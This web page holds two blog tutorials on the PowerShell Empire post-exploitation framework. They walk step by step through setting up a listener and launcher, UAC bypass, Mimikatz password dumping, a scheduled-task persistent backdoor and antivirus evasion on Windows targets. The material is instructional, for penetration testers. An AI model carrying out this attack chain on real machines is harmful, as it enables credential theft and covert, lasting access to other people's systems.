Informatica Video vigilanciaempireInformatica Video vigilancia

Soportes.IT

Post-Exploitation with PowerShell Empire 2.0

July 19, 2017 GusKhawaja

Empire PowerShell

Hi, this is Gus and welcome to this exciting tutorial about the new Empire version 2.0.

I’m pretty sure you’re curious and want to learn how to use it. In this lesson, I will walk you through and show you all the tricks so you can achieve your goals as a member of the red-team or as a penetration tester.

Let’s see together the workflow that I’ll be using for this demo.

First, I will show you how to install Empire

Second, you will learn how to create a listener. If you don’t know what a listener means. In fact, its name explains what it does, the listener listens for incoming connections from infected victims.

Next, I will show you how to create a PowerShell script to send it to your victim using the launcher in Empire.

Now when the victim executes the script he will be connected back to the listener and this will create an agent representing the victim machine.

All we need at this stage is to interact with the agent to escalate our privileges so we can become some sort of an admin, why? I will show you how to run Mimikatz, for example, using your admin privilege to extract the victim’s passwords.

Finally, I will make sure that you learn how to create a persistent backdoor so you can go back anytime you want.

Before I start this Demo, I want to let you know that this blog has a video demo on youtube:

Let’s start the action!

First, open your browser and go to the Empire GitHub website and click on the “Clone or download” button to copy the URL to your clipboard.

Now go and open your terminal window and execute git clone and paste the URL.

$git clone https://github.com/EmpireProject/Empire.git

$ls

$cd Empire

$cd setup

$ls

$chmod +x install.sh

$./install.sh

$cd ..

$ls

$chmod +x empire

$./empire

$./install.sh

$> listeners

$> uselistener http

$> execute

launcher powerhsell http

This will download the application to my home root directory in Kali Linux.

$ls

Let’s explore this new folder.

$cd Empire

If I check the contents of the empire directory I can see the setup folder.

$cd setup

Now I’m pretty sure that our installer is somewhere here

$ls

Here you go it’s the install.sh file.

Let’s give it the right permission and execute it to install Empire.

$chmod +x install.sh

The installation is going to take some time so be patient. After a while, the installer will ask you to enter a password or press enter to generate a random password, I’m going to press enter, and we’re done!

I will go up one directory to execute the empire application, but before doing this I will give it the right permission as well.

$cd ..

$ls

$chmod +x empire

Perfect, it’s the time to execute this monster.

$./empire

Voila! this is the Empire home screen. As you can see we have 267 modules ready to be used and No listeners or agents and that’s normal because it’s a fresh copy of Empire.

Let’s start by creating a listener. Type listeners

$> listeners

And you will get this message

[!] No listeners currently active

wait this is not an error message check the prompt, it changed to the listeners mode.

Next, I will choose the http based listener, so type:

$> uselistener http

And the prompt changed to the http listener, alright it’s time to execute it:

$> execute

Amazing! we should have a listener active at this moment.

$> listeners

Here in the details it shows that the Name of this listener is http and it’s listening on port 80 on my Kali Linux machine.

At this stage we need to create a launcher just type it in the terminal window and you get this message:

By analyzing this message let’s generate a PowerShell script and the listener name is http.

$> launcher powerhsell http

Perfect, let’s copy this PowerShell script to be ready for our windows7 machine.

I will open a new terminal window and use the remote desktop to connect remotely to the victim machine -u is for the user name -p is for the password and the IP address of the windows 7 host.

Let’s open a command prompt in windows and paste the powershell script.

Beautiful, let’s go back to the Empire terminal window, and we have an agent active.

Type back to go to the main window.

$> back

And here type agents to list the available agents.

We can see all the information needed that represents our Win7 machine, but the name is very random so I will rename it to something more meaningful.

Type rename followed by the first two letters then press tab and it will recognize it. Then type the desired new name.

$> rename [old name] [new name]

To list the agents at this stage you type list

$> list

And here you go our new name for the windows 7 agent.

Let’s try to interact with this agent:

$> interact [agent name]

And type info to see the necessary information about it.

$> info

Pay attention here, the High priority is set to 0, that’s because we are not admin. The next step is to elevate our privileges. We can become an admin in a single command and it’s called bypassuac followed by the name of the listener.

$> bypassuac http

Wait for a couple of seconds and you should see some text coming your way, and we have a new agent.

Press enter, go back and execute the list command to see the new agent.

$> [enter]

$> back

$> list

Check the difference here we have an asterisk before the username that means this a power user let’s rename this new agent:

$> rename [old name] [new name]

Let’s start interacting with this new agent.

$> interact [agent name]

$> info

Pay attention to the high integrity it’s 1 instead of zero.

Perfect, let’s run Mimikatz to extract the clear text passwords but first type creds to list all the cleartext passwords, and it’s empty.

$> creds

Next, run mimikatz and wait for a few seconds to finish its execution.

$> mimikatz

Awesome! let’s see the credential list and here you go all the passwords are extracted for us.

$> creds

It’s time for our final stage and it’s the backdoor persistence, if you’re ever lost in this application you have always the chance to type the help command to see the available choices:

$> help

To create a persistent backdoor I will use the module schtasks in Empire.

$> usemodule persistence/elevated/schtasks

Let’s check its options, I will set the onLogon to True because I want it to execute every time the victim user login to this machine. And set the listener name to http

And finally execute it:

$> info

$> set onLogon True

$> set Listener http

$> execute

And we now have a persistent backdoor with a big success.

Thank you for reading this tutorial. I hope that you liked it, until the next time!In this lesson, I will walk you through and show you all the tricks so you can achieve your goals as a member of the red-team or as a penetration tester.

Getting Started with Post-Exploitation of Windows Hosts

BY KALI NINJA 12/11/2017 5:28 PM

PowerShell Empire is a post-exploitation framework for computers and servers running Microsoft Windows, Windows Server operating systems, or both. In these tutorials, we will be exploring everything from how to install Powershell Empire to how to snoop around a victim's computer without the antivirus software knowing about it. If we are lucky, we might even be able to obtain domain administrator credentials and own the whole network.

A Tool for Targeting Windows

Exploit frameworks are popular, and most hackers have heard of Metasploit, a framework that automates the deployment of powerful exploits. You may be asking yourself, how does PowerShell Empire differ from Metasploit? Isn't Metasploit already serving the same purpose? Well, yes and no. PowerShell Empire deals strictly with Windows machines, and it is extremely useful in a penetration test because most targets these days are running some version of Windows.

Don't Miss: The Ultimate Command Sheet for Metasploit's Meterpreter

A simple example of this point would be the widespread usage of excel on Microsoft Windows. Since Microsoft Excel has more advanced features than the Mac version (as well as Office 365), we can assume that the finance department of most target companies will be using Microsoft Windows. Finance departments also usually have access to bank account numbers and other juicy data!

PowerShell Empire also gives the attacker the ability to run commands in memory. This means that the malicious actions being taken by PowerShell Empire are not run on the hard drive, they are instead run in the computer's memory. This reduces the likelihood of being caught by antivirus software as well as the likelihood of leaving digital fingerprints for forensics investigators.

When to Use PowerShell Empire

Some of the activities and goals that can be accomplished include privilege escalation (elevating privileges from a standard user account to an administrator), network and host reconnaissance (finding out what hosts and services are present), lateral movement between hosts, and the gathering of credentials. All of these are key components of a modern day penetration test.

PowerShell Empire accomplishes this via three main components: listeners, stagers, and agents.

A listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker's computer.

A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.

An agent is a program that maintains a connection between your computer and the compromised host.

Lastly, modules are where the fun is. These are what execute our malicious commands, which can harvest credentials and escalate our privileges as mentioned above.

Now that we have discussed what PowerShell Empire does and why it is useful, let's take a look at how to get it up and running.

Step 1Installing PowerShell Empire

To run Powershell, you will need a Kali Linux machine. If you need a good starter Kali computer for hacking, you can check out our guide on setting one up on the low-cost Raspberry Pi below.

Learn More: Build a Kali Linux Hacking Computer on the Raspberry Pi

To install Empire on your Kali Linux machine, we need to clone it from GitHub. Open a terminal and type the following command as shown below.

git clone https://github.com/EmpireProject/Empire.git

This will create a new directory with the name "Empire." Move into that directory by typing cd Empire, then use the ls command to view the contents of the directory.

You can read about Empire in the README.md file. You will see a "setup" folder inside the Empire directory. Navigate to that folder by typing cd setup, then use the ls command to view the contents of the "setup" folder. You can see an install shell script as shown below.

Type ./install.sh to install Empire by running the script. The installation will start as shown below.

During the installation process, you will be asked to set up a server negotiation password. I set it as "toor,' but you can choose your own password. If everything went well, the installation will finish as shown below.

We are done with the installation. Now, it's time to start Empire.

Step 2Running Powershell Empire

Move back to the Empire directory by typing cd .. and run the ./empire executable as shown. It will start as seen below.

If Empire displays any error while starting, navigate to the "setup" folder with cd setup and run the ./reset.sh script. Then restart Empire again like we did before. It will display a welcome message as shown below.

Upon completion, Empire will show the following screen.

As of this writing, Empire has 267 modules. Don't worry if these sound like complicated ninjitsu techniques; with diligence and practice you will learn what modules, listeners, and agents are. By the end of this series, you will get a clear idea what these are and how to use them.

First, let's start by typing the help command. The help command will display the help menu as seen below.

Step 3Using Listeners

Listeners in Empire are the channels which receive connections from our target machine. Before we do anything in Empire, we need to start the listeners. We can move to the listener management menu by typing command listeners as shown below.

Once we move to the listeners management menu, as shown above, we can see its sub-menu by typing the help command. Let's take a look at what each command will do.

agents - Will allow you to jump to agents menu.

back & main – Will take you back to the main menu.

exit – Will exit from Empire.

help – Will display help menu as shown in the above image.

info – Will display information about the active listener.

kill – Will kill a particular listener.

launcher – Used to generate an initial launcher for a listener.

list – Will list all the active listeners.

usestager – Used to use a stager (we will see below what exactly is a stager).

uselistener – Used to start a listener module.

Let us now look at how to start a listener module in Empire. Type the uselistener command, and use tab completion to see the listeners available in Empire.

The types of listeners available are shown above. We will learn about different types of listeners in the upcoming sections. For now, let's see how to start a listener.

Let's use the "meterpreter" listener as an example. Type uselistener meterpreter as shown above. Once the particular listener is loaded, you can type help command to display the available options.

The agents, back, exit, help, launcher, listeners, and main commands have been explained above. Let us learn about the other commands.

The info command shows the information about the particular type of listener we want to start, as seen below.

Every listener requires certain options to be set. For example, the "meterpreter" listener needs the Host and Port values to be configured. The set command is used to assign these values. Similarly, the unset command is used to clear these values.

Don't Miss: How to Use Listeners

One important thing to remember is that Empire is case sensitive. For example, in the screenshot below, I am setting the "Name" value of our listener. "Name" and "name" are different in Empire, and it will give you an error if they are used incorrectly, as they cannot be used interchangeably.

When all options are set, we can start a listener using the execute command.

Once we go back to the main menu, we can see that our listener is currently active.

Step 4Using Stagers

Stagers in Empire are used to set the stage for the post-exploitation activities. They are similar to payloads, which are used to create a connection back to Empire. The stagers can be accessed using the usestager command as shown below.

Don't Miss: How to Use Payloads with Metasploit

Type the usestager and then use the tab completion to see all the available stagers.

We will learn about different stagers in an upcoming section. First, let's take a look at how to set up a stager.

Let's start the "launcher_bat" stager as an example.

Type the usestager windows/launcher_bat command to load the stager.

Type the help command to have a look at the stager menu.

agents - Will allow you to jump directly to agents menu.

back & main – Will take you back to the main menu.

exit – Will exit from Empire.

help- Will display help menu as shown in the above image.

info- Will display information about the active listener.

kill- Is used to kill a particular listener.

execute or generate – Will execute or generate the stager.

interact – Is used to interact with a particular agent (normally used when there are multiple listeners).

list - Will list all the active listeners or agents.

options- Used to see all the options we need to set for the particular agent.

set and unset – Used to set and unset values to particular options, respectively.

listeners - Used to jump to listeners menu.

We can get more information about this particular stager by using the info command. As you can see in the info, it creates a self-deleting batch file.

We need to set a listener in order for the stager to be able to communicate with Empire. In the last step, we have already created a listener. Let us set this listener for our "launcher_bat" stager.

We can do this using set Listener meterp command. Type the execute command to generate the stager. The stager is created in the "tmp" folder as indicated by the output shown above in blue.

Step 5Using Agents

When we send the stager to our target system and the machine engages with it, we get a reverse connection back. This is known as an agent.

The Agents menu can be accessed using agents command as shown below. But, as is stated in the red output, we do not currently have any agents registered. That is just around the corner.

The output of the help command is shown above. It will display all the commands we can use when an agent establishes a connection with Empire. For example, typing the list command will show all the active agents we have, as shown below.

Step 6Using Modules

Modules in Empire are used to perform specific functions. We can access modules using the usemodule command. Type usemodule <Space> and then use tab completion to see all the modules.

We will learn more about different modules in a later tutorial. First, let's take a look at how to use modules in Empire. Let's use the "external/generate_agent" as an example. Type usemodule external/generate_agent to load the module. Once the required module is loaded, type help to see all the commands we can use with the module.

agents - Will allow you to jump directly to agents menu.

back & main – Will take you back to the main menu

exit – Will exit from Empire.

help – Will display help menu as shown in the above image.

info – Will display information about the active listener.

kill – Is used to kill a particular listener.

execute or run – Will execute the selected module.

interact – Is used to interact with a particular agent (normally used when there are multiple listeners).

list – Will list all the active listeners or agents.

options – Is used to see all the options we need to set for the particular agent.

set and unset – Used to set and unset values for particular options.

listeners – Used to jump to listeners menu.

reload – Will reload the current module.

Type the options command to see the options required for the module.

Set the required options using the set command, and when complete, use the execute command to generate the module.

We will get into more detail about Empire in the upcoming sections. These are the first steps in getting Empire up and running, so stay tuned for more! You can leave any questions in the comments below.